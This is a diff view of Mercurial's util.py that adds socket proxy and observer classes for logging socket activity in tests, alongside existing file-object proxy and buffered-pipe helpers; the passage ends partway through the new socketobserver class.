##// END OF EJS Templates
util: observable proxy objects for sockets...
Gregory Szorc -
r37028:8453699a default
parent child Browse files
Show More
@@ -1,4091 +1,4324 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import codecs
21 21 import collections
22 22 import contextlib
23 23 import errno
24 24 import gc
25 25 import hashlib
26 26 import imp
27 27 import io
28 28 import itertools
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 node as nodemod,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56 from .utils import dateutil
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 bytesio = pycompat.bytesio
75 75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 76 stringio = bytesio
77 77 xmlrpclib = pycompat.xmlrpclib
78 78
79 79 httpserver = urllibcompat.httpserver
80 80 urlerr = urllibcompat.urlerr
81 81 urlreq = urllibcompat.urlreq
82 82
83 83 # workaround for win32mbcs
84 84 _filenamebytestr = pycompat.bytestr
85 85
86 86 def isatty(fp):
87 87 try:
88 88 return fp.isatty()
89 89 except AttributeError:
90 90 return False
91 91
92 92 # glibc determines buffering on first write to stdout - if we replace a TTY
93 93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 94 # buffering
95 95 if isatty(stdout):
96 96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97 97
98 98 if pycompat.iswindows:
99 99 from . import windows as platform
100 100 stdout = platform.winstdout(stdout)
101 101 else:
102 102 from . import posix as platform
103 103
104 104 _ = i18n._
105 105
106 106 bindunixsocket = platform.bindunixsocket
107 107 cachestat = platform.cachestat
108 108 checkexec = platform.checkexec
109 109 checklink = platform.checklink
110 110 copymode = platform.copymode
111 111 executablepath = platform.executablepath
112 112 expandglobs = platform.expandglobs
113 113 explainexit = platform.explainexit
114 114 findexe = platform.findexe
115 115 getfsmountpoint = platform.getfsmountpoint
116 116 getfstype = platform.getfstype
117 117 gethgcmd = platform.gethgcmd
118 118 getuser = platform.getuser
119 119 getpid = os.getpid
120 120 groupmembers = platform.groupmembers
121 121 groupname = platform.groupname
122 122 hidewindow = platform.hidewindow
123 123 isexec = platform.isexec
124 124 isowner = platform.isowner
125 125 listdir = osutil.listdir
126 126 localpath = platform.localpath
127 127 lookupreg = platform.lookupreg
128 128 makedir = platform.makedir
129 129 nlinks = platform.nlinks
130 130 normpath = platform.normpath
131 131 normcase = platform.normcase
132 132 normcasespec = platform.normcasespec
133 133 normcasefallback = platform.normcasefallback
134 134 openhardlinks = platform.openhardlinks
135 135 oslink = platform.oslink
136 136 parsepatchoutput = platform.parsepatchoutput
137 137 pconvert = platform.pconvert
138 138 poll = platform.poll
139 139 popen = platform.popen
140 140 posixfile = platform.posixfile
141 141 quotecommand = platform.quotecommand
142 142 readpipe = platform.readpipe
143 143 rename = platform.rename
144 144 removedirs = platform.removedirs
145 145 samedevice = platform.samedevice
146 146 samefile = platform.samefile
147 147 samestat = platform.samestat
148 148 setbinary = platform.setbinary
149 149 setflags = platform.setflags
150 150 setsignalhandler = platform.setsignalhandler
151 151 shellquote = platform.shellquote
152 152 shellsplit = platform.shellsplit
153 153 spawndetached = platform.spawndetached
154 154 split = platform.split
155 155 sshargs = platform.sshargs
156 156 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
157 157 statisexec = platform.statisexec
158 158 statislink = platform.statislink
159 159 testpid = platform.testpid
160 160 umask = platform.umask
161 161 unlink = platform.unlink
162 162 username = platform.username
163 163
164 164 try:
165 165 recvfds = osutil.recvfds
166 166 except AttributeError:
167 167 pass
168 168 try:
169 169 setprocname = osutil.setprocname
170 170 except AttributeError:
171 171 pass
172 172 try:
173 173 unblocksignal = osutil.unblocksignal
174 174 except AttributeError:
175 175 pass
176 176
177 177 # Python compatibility
178 178
179 179 _notset = object()
180 180
181 181 def safehasattr(thing, attr):
182 182 return getattr(thing, attr, _notset) is not _notset
183 183
184 184 def _rapply(f, xs):
185 185 if xs is None:
186 186 # assume None means non-value of optional data
187 187 return xs
188 188 if isinstance(xs, (list, set, tuple)):
189 189 return type(xs)(_rapply(f, x) for x in xs)
190 190 if isinstance(xs, dict):
191 191 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
192 192 return f(xs)
193 193
194 194 def rapply(f, xs):
195 195 """Apply function recursively to every item preserving the data structure
196 196
197 197 >>> def f(x):
198 198 ... return 'f(%s)' % x
199 199 >>> rapply(f, None) is None
200 200 True
201 201 >>> rapply(f, 'a')
202 202 'f(a)'
203 203 >>> rapply(f, {'a'}) == {'f(a)'}
204 204 True
205 205 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
206 206 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
207 207
208 208 >>> xs = [object()]
209 209 >>> rapply(pycompat.identity, xs) is xs
210 210 True
211 211 """
212 212 if f is pycompat.identity:
213 213 # fast path mainly for py2
214 214 return xs
215 215 return _rapply(f, xs)
216 216
217 217 def bitsfrom(container):
218 218 bits = 0
219 219 for bit in container:
220 220 bits |= bit
221 221 return bits
222 222
223 223 # python 2.6 still have deprecation warning enabled by default. We do not want
224 224 # to display anything to standard user so detect if we are running test and
225 225 # only use python deprecation warning in this case.
226 226 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
227 227 if _dowarn:
228 228 # explicitly unfilter our warning for python 2.7
229 229 #
230 230 # The option of setting PYTHONWARNINGS in the test runner was investigated.
231 231 # However, module name set through PYTHONWARNINGS was exactly matched, so
232 232 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
233 233 # makes the whole PYTHONWARNINGS thing useless for our usecase.
234 234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
235 235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
236 236 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
237 237 if _dowarn and pycompat.ispy3:
238 238 # silence warning emitted by passing user string to re.sub()
239 239 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
240 240 r'mercurial')
241 241 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
242 242 DeprecationWarning, r'mercurial')
243 243
244 244 def nouideprecwarn(msg, version, stacklevel=1):
245 245 """Issue an python native deprecation warning
246 246
247 247 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
248 248 """
249 249 if _dowarn:
250 250 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
251 251 " update your code.)") % version
252 252 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
253 253
254 254 DIGESTS = {
255 255 'md5': hashlib.md5,
256 256 'sha1': hashlib.sha1,
257 257 'sha512': hashlib.sha512,
258 258 }
259 259 # List of digest types from strongest to weakest
260 260 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
261 261
262 262 for k in DIGESTS_BY_STRENGTH:
263 263 assert k in DIGESTS
264 264
265 265 class digester(object):
266 266 """helper to compute digests.
267 267
268 268 This helper can be used to compute one or more digests given their name.
269 269
270 270 >>> d = digester([b'md5', b'sha1'])
271 271 >>> d.update(b'foo')
272 272 >>> [k for k in sorted(d)]
273 273 ['md5', 'sha1']
274 274 >>> d[b'md5']
275 275 'acbd18db4cc2f85cedef654fccc4a4d8'
276 276 >>> d[b'sha1']
277 277 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
278 278 >>> digester.preferred([b'md5', b'sha1'])
279 279 'sha1'
280 280 """
281 281
282 282 def __init__(self, digests, s=''):
283 283 self._hashes = {}
284 284 for k in digests:
285 285 if k not in DIGESTS:
286 286 raise Abort(_('unknown digest type: %s') % k)
287 287 self._hashes[k] = DIGESTS[k]()
288 288 if s:
289 289 self.update(s)
290 290
291 291 def update(self, data):
292 292 for h in self._hashes.values():
293 293 h.update(data)
294 294
295 295 def __getitem__(self, key):
296 296 if key not in DIGESTS:
297 297 raise Abort(_('unknown digest type: %s') % k)
298 298 return nodemod.hex(self._hashes[key].digest())
299 299
300 300 def __iter__(self):
301 301 return iter(self._hashes)
302 302
303 303 @staticmethod
304 304 def preferred(supported):
305 305 """returns the strongest digest type in both supported and DIGESTS."""
306 306
307 307 for k in DIGESTS_BY_STRENGTH:
308 308 if k in supported:
309 309 return k
310 310 return None
311 311
312 312 class digestchecker(object):
313 313 """file handle wrapper that additionally checks content against a given
314 314 size and digests.
315 315
316 316 d = digestchecker(fh, size, {'md5': '...'})
317 317
318 318 When multiple digests are given, all of them are validated.
319 319 """
320 320
321 321 def __init__(self, fh, size, digests):
322 322 self._fh = fh
323 323 self._size = size
324 324 self._got = 0
325 325 self._digests = dict(digests)
326 326 self._digester = digester(self._digests.keys())
327 327
328 328 def read(self, length=-1):
329 329 content = self._fh.read(length)
330 330 self._digester.update(content)
331 331 self._got += len(content)
332 332 return content
333 333
334 334 def validate(self):
335 335 if self._size != self._got:
336 336 raise Abort(_('size mismatch: expected %d, got %d') %
337 337 (self._size, self._got))
338 338 for k, v in self._digests.items():
339 339 if v != self._digester[k]:
340 340 # i18n: first parameter is a digest name
341 341 raise Abort(_('%s mismatch: expected %s, got %s') %
342 342 (k, v, self._digester[k]))
343 343
344 344 try:
345 345 buffer = buffer
346 346 except NameError:
347 347 def buffer(sliceable, offset=0, length=None):
348 348 if length is not None:
349 349 return memoryview(sliceable)[offset:offset + length]
350 350 return memoryview(sliceable)[offset:]
351 351
352 352 closefds = pycompat.isposix
353 353
354 354 _chunksize = 4096
355 355
356 356 class bufferedinputpipe(object):
357 357 """a manually buffered input pipe
358 358
359 359 Python will not let us use buffered IO and lazy reading with 'polling' at
360 360 the same time. We cannot probe the buffer state and select will not detect
361 361 that data are ready to read if they are already buffered.
362 362
363 363 This class let us work around that by implementing its own buffering
364 364 (allowing efficient readline) while offering a way to know if the buffer is
365 365 empty from the output (allowing collaboration of the buffer with polling).
366 366
367 367 This class lives in the 'util' module because it makes use of the 'os'
368 368 module from the python stdlib.
369 369 """
370 370 def __new__(cls, fh):
371 371 # If we receive a fileobjectproxy, we need to use a variation of this
372 372 # class that notifies observers about activity.
373 373 if isinstance(fh, fileobjectproxy):
374 374 cls = observedbufferedinputpipe
375 375
376 376 return super(bufferedinputpipe, cls).__new__(cls)
377 377
378 378 def __init__(self, input):
379 379 self._input = input
380 380 self._buffer = []
381 381 self._eof = False
382 382 self._lenbuf = 0
383 383
384 384 @property
385 385 def hasbuffer(self):
386 386 """True is any data is currently buffered
387 387
388 388 This will be used externally a pre-step for polling IO. If there is
389 389 already data then no polling should be set in place."""
390 390 return bool(self._buffer)
391 391
392 392 @property
393 393 def closed(self):
394 394 return self._input.closed
395 395
396 396 def fileno(self):
397 397 return self._input.fileno()
398 398
399 399 def close(self):
400 400 return self._input.close()
401 401
402 402 def read(self, size):
403 403 while (not self._eof) and (self._lenbuf < size):
404 404 self._fillbuffer()
405 405 return self._frombuffer(size)
406 406
407 407 def readline(self, *args, **kwargs):
408 408 if 1 < len(self._buffer):
409 409 # this should not happen because both read and readline end with a
410 410 # _frombuffer call that collapse it.
411 411 self._buffer = [''.join(self._buffer)]
412 412 self._lenbuf = len(self._buffer[0])
413 413 lfi = -1
414 414 if self._buffer:
415 415 lfi = self._buffer[-1].find('\n')
416 416 while (not self._eof) and lfi < 0:
417 417 self._fillbuffer()
418 418 if self._buffer:
419 419 lfi = self._buffer[-1].find('\n')
420 420 size = lfi + 1
421 421 if lfi < 0: # end of file
422 422 size = self._lenbuf
423 423 elif 1 < len(self._buffer):
424 424 # we need to take previous chunks into account
425 425 size += self._lenbuf - len(self._buffer[-1])
426 426 return self._frombuffer(size)
427 427
428 428 def _frombuffer(self, size):
429 429 """return at most 'size' data from the buffer
430 430
431 431 The data are removed from the buffer."""
432 432 if size == 0 or not self._buffer:
433 433 return ''
434 434 buf = self._buffer[0]
435 435 if 1 < len(self._buffer):
436 436 buf = ''.join(self._buffer)
437 437
438 438 data = buf[:size]
439 439 buf = buf[len(data):]
440 440 if buf:
441 441 self._buffer = [buf]
442 442 self._lenbuf = len(buf)
443 443 else:
444 444 self._buffer = []
445 445 self._lenbuf = 0
446 446 return data
447 447
448 448 def _fillbuffer(self):
449 449 """read data to the buffer"""
450 450 data = os.read(self._input.fileno(), _chunksize)
451 451 if not data:
452 452 self._eof = True
453 453 else:
454 454 self._lenbuf += len(data)
455 455 self._buffer.append(data)
456 456
457 457 return data
458 458
459 459 def mmapread(fp):
460 460 try:
461 461 fd = getattr(fp, 'fileno', lambda: fp)()
462 462 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
463 463 except ValueError:
464 464 # Empty files cannot be mmapped, but mmapread should still work. Check
465 465 # if the file is empty, and if so, return an empty buffer.
466 466 if os.fstat(fd).st_size == 0:
467 467 return ''
468 468 raise
469 469
470 470 def popen2(cmd, env=None, newlines=False):
471 471 # Setting bufsize to -1 lets the system decide the buffer size.
472 472 # The default for bufsize is 0, meaning unbuffered. This leads to
473 473 # poor performance on Mac OS X: http://bugs.python.org/issue4194
474 474 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
475 475 close_fds=closefds,
476 476 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
477 477 universal_newlines=newlines,
478 478 env=env)
479 479 return p.stdin, p.stdout
480 480
481 481 def popen3(cmd, env=None, newlines=False):
482 482 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
483 483 return stdin, stdout, stderr
484 484
485 485 def popen4(cmd, env=None, newlines=False, bufsize=-1):
486 486 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
487 487 close_fds=closefds,
488 488 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
489 489 stderr=subprocess.PIPE,
490 490 universal_newlines=newlines,
491 491 env=env)
492 492 return p.stdin, p.stdout, p.stderr, p
493 493
494 494 class fileobjectproxy(object):
495 495 """A proxy around file objects that tells a watcher when events occur.
496 496
497 497 This type is intended to only be used for testing purposes. Think hard
498 498 before using it in important code.
499 499 """
500 500 __slots__ = (
501 501 r'_orig',
502 502 r'_observer',
503 503 )
504 504
505 505 def __init__(self, fh, observer):
506 506 object.__setattr__(self, r'_orig', fh)
507 507 object.__setattr__(self, r'_observer', observer)
508 508
509 509 def __getattribute__(self, name):
510 510 ours = {
511 511 r'_observer',
512 512
513 513 # IOBase
514 514 r'close',
515 515 # closed if a property
516 516 r'fileno',
517 517 r'flush',
518 518 r'isatty',
519 519 r'readable',
520 520 r'readline',
521 521 r'readlines',
522 522 r'seek',
523 523 r'seekable',
524 524 r'tell',
525 525 r'truncate',
526 526 r'writable',
527 527 r'writelines',
528 528 # RawIOBase
529 529 r'read',
530 530 r'readall',
531 531 r'readinto',
532 532 r'write',
533 533 # BufferedIOBase
534 534 # raw is a property
535 535 r'detach',
536 536 # read defined above
537 537 r'read1',
538 538 # readinto defined above
539 539 # write defined above
540 540 }
541 541
542 542 # We only observe some methods.
543 543 if name in ours:
544 544 return object.__getattribute__(self, name)
545 545
546 546 return getattr(object.__getattribute__(self, r'_orig'), name)
547 547
548 548 def __nonzero__(self):
549 549 return bool(object.__getattribute__(self, r'_orig'))
550 550
551 551 __bool__ = __nonzero__
552 552
553 553 def __delattr__(self, name):
554 554 return delattr(object.__getattribute__(self, r'_orig'), name)
555 555
556 556 def __setattr__(self, name, value):
557 557 return setattr(object.__getattribute__(self, r'_orig'), name, value)
558 558
559 559 def __iter__(self):
560 560 return object.__getattribute__(self, r'_orig').__iter__()
561 561
562 562 def _observedcall(self, name, *args, **kwargs):
563 563 # Call the original object.
564 564 orig = object.__getattribute__(self, r'_orig')
565 565 res = getattr(orig, name)(*args, **kwargs)
566 566
567 567 # Call a method on the observer of the same name with arguments
568 568 # so it can react, log, etc.
569 569 observer = object.__getattribute__(self, r'_observer')
570 570 fn = getattr(observer, name, None)
571 571 if fn:
572 572 fn(res, *args, **kwargs)
573 573
574 574 return res
575 575
576 576 def close(self, *args, **kwargs):
577 577 return object.__getattribute__(self, r'_observedcall')(
578 578 r'close', *args, **kwargs)
579 579
580 580 def fileno(self, *args, **kwargs):
581 581 return object.__getattribute__(self, r'_observedcall')(
582 582 r'fileno', *args, **kwargs)
583 583
584 584 def flush(self, *args, **kwargs):
585 585 return object.__getattribute__(self, r'_observedcall')(
586 586 r'flush', *args, **kwargs)
587 587
588 588 def isatty(self, *args, **kwargs):
589 589 return object.__getattribute__(self, r'_observedcall')(
590 590 r'isatty', *args, **kwargs)
591 591
592 592 def readable(self, *args, **kwargs):
593 593 return object.__getattribute__(self, r'_observedcall')(
594 594 r'readable', *args, **kwargs)
595 595
596 596 def readline(self, *args, **kwargs):
597 597 return object.__getattribute__(self, r'_observedcall')(
598 598 r'readline', *args, **kwargs)
599 599
600 600 def readlines(self, *args, **kwargs):
601 601 return object.__getattribute__(self, r'_observedcall')(
602 602 r'readlines', *args, **kwargs)
603 603
604 604 def seek(self, *args, **kwargs):
605 605 return object.__getattribute__(self, r'_observedcall')(
606 606 r'seek', *args, **kwargs)
607 607
608 608 def seekable(self, *args, **kwargs):
609 609 return object.__getattribute__(self, r'_observedcall')(
610 610 r'seekable', *args, **kwargs)
611 611
612 612 def tell(self, *args, **kwargs):
613 613 return object.__getattribute__(self, r'_observedcall')(
614 614 r'tell', *args, **kwargs)
615 615
616 616 def truncate(self, *args, **kwargs):
617 617 return object.__getattribute__(self, r'_observedcall')(
618 618 r'truncate', *args, **kwargs)
619 619
620 620 def writable(self, *args, **kwargs):
621 621 return object.__getattribute__(self, r'_observedcall')(
622 622 r'writable', *args, **kwargs)
623 623
624 624 def writelines(self, *args, **kwargs):
625 625 return object.__getattribute__(self, r'_observedcall')(
626 626 r'writelines', *args, **kwargs)
627 627
628 628 def read(self, *args, **kwargs):
629 629 return object.__getattribute__(self, r'_observedcall')(
630 630 r'read', *args, **kwargs)
631 631
632 632 def readall(self, *args, **kwargs):
633 633 return object.__getattribute__(self, r'_observedcall')(
634 634 r'readall', *args, **kwargs)
635 635
636 636 def readinto(self, *args, **kwargs):
637 637 return object.__getattribute__(self, r'_observedcall')(
638 638 r'readinto', *args, **kwargs)
639 639
640 640 def write(self, *args, **kwargs):
641 641 return object.__getattribute__(self, r'_observedcall')(
642 642 r'write', *args, **kwargs)
643 643
644 644 def detach(self, *args, **kwargs):
645 645 return object.__getattribute__(self, r'_observedcall')(
646 646 r'detach', *args, **kwargs)
647 647
648 648 def read1(self, *args, **kwargs):
649 649 return object.__getattribute__(self, r'_observedcall')(
650 650 r'read1', *args, **kwargs)
651 651
652 652 class observedbufferedinputpipe(bufferedinputpipe):
653 653 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
654 654
655 655 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
656 656 bypass ``fileobjectproxy``. Because of this, we need to make
657 657 ``bufferedinputpipe`` aware of these operations.
658 658
659 659 This variation of ``bufferedinputpipe`` can notify observers about
660 660 ``os.read()`` events. It also re-publishes other events, such as
661 661 ``read()`` and ``readline()``.
662 662 """
663 663 def _fillbuffer(self):
664 664 res = super(observedbufferedinputpipe, self)._fillbuffer()
665 665
666 666 fn = getattr(self._input._observer, r'osread', None)
667 667 if fn:
668 668 fn(res, _chunksize)
669 669
670 670 return res
671 671
672 672 # We use different observer methods because the operation isn't
673 673 # performed on the actual file object but on us.
674 674 def read(self, size):
675 675 res = super(observedbufferedinputpipe, self).read(size)
676 676
677 677 fn = getattr(self._input._observer, r'bufferedread', None)
678 678 if fn:
679 679 fn(res, size)
680 680
681 681 return res
682 682
683 683 def readline(self, *args, **kwargs):
684 684 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
685 685
686 686 fn = getattr(self._input._observer, r'bufferedreadline', None)
687 687 if fn:
688 688 fn(res)
689 689
690 690 return res
691 691
692 PROXIED_SOCKET_METHODS = {
693 r'makefile',
694 r'recv',
695 r'recvfrom',
696 r'recvfrom_into',
697 r'recv_into',
698 r'send',
699 r'sendall',
700 r'sendto',
701 r'setblocking',
702 r'settimeout',
703 r'gettimeout',
704 r'setsockopt',
705 }
706
707 class socketproxy(object):
708 """A proxy around a socket that tells a watcher when events occur.
709
710 This is like ``fileobjectproxy`` except for sockets.
711
712 This type is intended to only be used for testing purposes. Think hard
713 before using it in important code.
714 """
715 __slots__ = (
716 r'_orig',
717 r'_observer',
718 )
719
720 def __init__(self, sock, observer):
721 object.__setattr__(self, r'_orig', sock)
722 object.__setattr__(self, r'_observer', observer)
723
724 def __getattribute__(self, name):
725 if name in PROXIED_SOCKET_METHODS:
726 return object.__getattribute__(self, name)
727
728 return getattr(object.__getattribute__(self, r'_orig'), name)
729
730 def __delattr__(self, name):
731 return delattr(object.__getattribute__(self, r'_orig'), name)
732
733 def __setattr__(self, name, value):
734 return setattr(object.__getattribute__(self, r'_orig'), name, value)
735
736 def __nonzero__(self):
737 return bool(object.__getattribute__(self, r'_orig'))
738
739 __bool__ = __nonzero__
740
741 def _observedcall(self, name, *args, **kwargs):
742 # Call the original object.
743 orig = object.__getattribute__(self, r'_orig')
744 res = getattr(orig, name)(*args, **kwargs)
745
746 # Call a method on the observer of the same name with arguments
747 # so it can react, log, etc.
748 observer = object.__getattribute__(self, r'_observer')
749 fn = getattr(observer, name, None)
750 if fn:
751 fn(res, *args, **kwargs)
752
753 return res
754
755 def makefile(self, *args, **kwargs):
756 res = object.__getattribute__(self, r'_observedcall')(
757 r'makefile', *args, **kwargs)
758
759 # The file object may be used for I/O. So we turn it into a
760 # proxy using our observer.
761 observer = object.__getattribute__(self, r'_observer')
762 return makeloggingfileobject(observer.fh, res, observer.name,
763 reads=observer.reads,
764 writes=observer.writes,
765 logdata=observer.logdata)
766
767 def recv(self, *args, **kwargs):
768 return object.__getattribute__(self, r'_observedcall')(
769 r'recv', *args, **kwargs)
770
771 def recvfrom(self, *args, **kwargs):
772 return object.__getattribute__(self, r'_observedcall')(
773 r'recvfrom', *args, **kwargs)
774
775 def recvfrom_into(self, *args, **kwargs):
776 return object.__getattribute__(self, r'_observedcall')(
777 r'recvfrom_into', *args, **kwargs)
778
779 def recv_into(self, *args, **kwargs):
780 return object.__getattribute__(self, r'_observedcall')(
781 r'recv_info', *args, **kwargs)
782
783 def send(self, *args, **kwargs):
784 return object.__getattribute__(self, r'_observedcall')(
785 r'send', *args, **kwargs)
786
787 def sendall(self, *args, **kwargs):
788 return object.__getattribute__(self, r'_observedcall')(
789 r'sendall', *args, **kwargs)
790
791 def sendto(self, *args, **kwargs):
792 return object.__getattribute__(self, r'_observedcall')(
793 r'sendto', *args, **kwargs)
794
795 def setblocking(self, *args, **kwargs):
796 return object.__getattribute__(self, r'_observedcall')(
797 r'setblocking', *args, **kwargs)
798
799 def settimeout(self, *args, **kwargs):
800 return object.__getattribute__(self, r'_observedcall')(
801 r'settimeout', *args, **kwargs)
802
803 def gettimeout(self, *args, **kwargs):
804 return object.__getattribute__(self, r'_observedcall')(
805 r'gettimeout', *args, **kwargs)
806
807 def setsockopt(self, *args, **kwargs):
808 return object.__getattribute__(self, r'_observedcall')(
809 r'setsockopt', *args, **kwargs)
810
692 811 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
693 812 DATA_ESCAPE_MAP.update({
694 813 b'\\': b'\\\\',
695 814 b'\r': br'\r',
696 815 b'\n': br'\n',
697 816 })
698 817 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
699 818
700 819 def escapedata(s):
701 820 if isinstance(s, bytearray):
702 821 s = bytes(s)
703 822
704 823 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
705 824
706 class fileobjectobserver(object):
707 """Logs file object activity."""
708 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
709 self.fh = fh
710 self.name = name
711 self.logdata = logdata
712 self.reads = reads
713 self.writes = writes
714
825 class baseproxyobserver(object):
715 826 def _writedata(self, data):
716 827 if not self.logdata:
717 828 self.fh.write('\n')
718 829 self.fh.flush()
719 830 return
720 831
721 832 # Simple case writes all data on a single line.
722 833 if b'\n' not in data:
723 834 self.fh.write(': %s\n' % escapedata(data))
724 835 self.fh.flush()
725 836 return
726 837
727 838 # Data with newlines is written to multiple lines.
728 839 self.fh.write(':\n')
729 840 lines = data.splitlines(True)
730 841 for line in lines:
731 842 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
732 843 self.fh.flush()
733 844
845 class fileobjectobserver(baseproxyobserver):
846 """Logs file object activity."""
847 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
848 self.fh = fh
849 self.name = name
850 self.logdata = logdata
851 self.reads = reads
852 self.writes = writes
853
734 854 def read(self, res, size=-1):
735 855 if not self.reads:
736 856 return
737 857 # Python 3 can return None from reads at EOF instead of empty strings.
738 858 if res is None:
739 859 res = ''
740 860
741 861 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
742 862 self._writedata(res)
743 863
744 864 def readline(self, res, limit=-1):
745 865 if not self.reads:
746 866 return
747 867
748 868 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
749 869 self._writedata(res)
750 870
751 871 def readinto(self, res, dest):
752 872 if not self.reads:
753 873 return
754 874
755 875 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
756 876 res))
757 877 data = dest[0:res] if res is not None else b''
758 878 self._writedata(data)
759 879
760 880 def write(self, res, data):
761 881 if not self.writes:
762 882 return
763 883
764 884 # Python 2 returns None from some write() calls. Python 3 (reasonably)
765 885 # returns the integer bytes written.
766 886 if res is None and data:
767 887 res = len(data)
768 888
769 889 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
770 890 self._writedata(data)
771 891
772 892 def flush(self, res):
773 893 if not self.writes:
774 894 return
775 895
776 896 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
777 897
778 898 # For observedbufferedinputpipe.
779 899 def bufferedread(self, res, size):
780 900 self.fh.write('%s> bufferedread(%d) -> %d' % (
781 901 self.name, size, len(res)))
782 902 self._writedata(res)
783 903
784 904 def bufferedreadline(self, res):
785 905 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
786 906 self._writedata(res)
787 907
788 908 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
789 909 logdata=False):
790 910 """Turn a file object into a logging file object."""
791 911
792 912 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
793 913 logdata=logdata)
794 914 return fileobjectproxy(fh, observer)
795 915
916 class socketobserver(baseproxyobserver):
917 """Logs socket activity."""
918 def __init__(self, fh, name, reads=True, writes=True, states=True,
919 logdata=False):
920 self.fh = fh
921 self.name = name
922 self.reads = reads
923 self.writes = writes
924 self.states = states
925 self.logdata = logdata
926
927 def makefile(self, res, mode=None, bufsize=None):
928 if not self.states:
929 return
930
931 self.fh.write('%s> makefile(%r, %r)\n' % (
932 self.name, mode, bufsize))
933
934 def recv(self, res, size, flags=0):
935 if not self.reads:
936 return
937
938 self.fh.write('%s> recv(%d, %d) -> %d' % (
939 self.name, size, flags, len(res)))
940 self._writedata(res)
941
942 def recvfrom(self, res, size, flags=0):
943 if not self.reads:
944 return
945
946 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
947 self.name, size, flags, len(res[0])))
948 self._writedata(res[0])
949
950 def recvfrom_into(self, res, buf, size, flags=0):
951 if not self.reads:
952 return
953
954 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
955 self.name, size, flags, res[0]))
956 self._writedata(buf[0:res[0]])
957
958 def recv_into(self, res, buf, size=0, flags=0):
959 if not self.reads:
960 return
961
962 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
963 self.name, size, flags, res))
964 self._writedata(buf[0:res])
965
966 def send(self, res, data, flags=0):
967 if not self.writes:
968 return
969
970 self.fh.write('%s> send(%d, %d) -> %d' % (
971 self.name, len(data), flags, len(res)))
972 self._writedata(data)
973
974 def sendall(self, res, data, flags=0):
975 if not self.writes:
976 return
977
978 # Returns None on success. So don't bother reporting return value.
979 self.fh.write('%s> sendall(%d, %d)' % (
980 self.name, len(data), flags))
981 self._writedata(data)
982
983 def sendto(self, res, data, flagsoraddress, address=None):
984 if not self.writes:
985 return
986
987 if address:
988 flags = flagsoraddress
989 else:
990 flags = 0
991
992 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
993 self.name, len(data), flags, address, res))
994 self._writedata(data)
995
996 def setblocking(self, res, flag):
997 if not self.states:
998 return
999
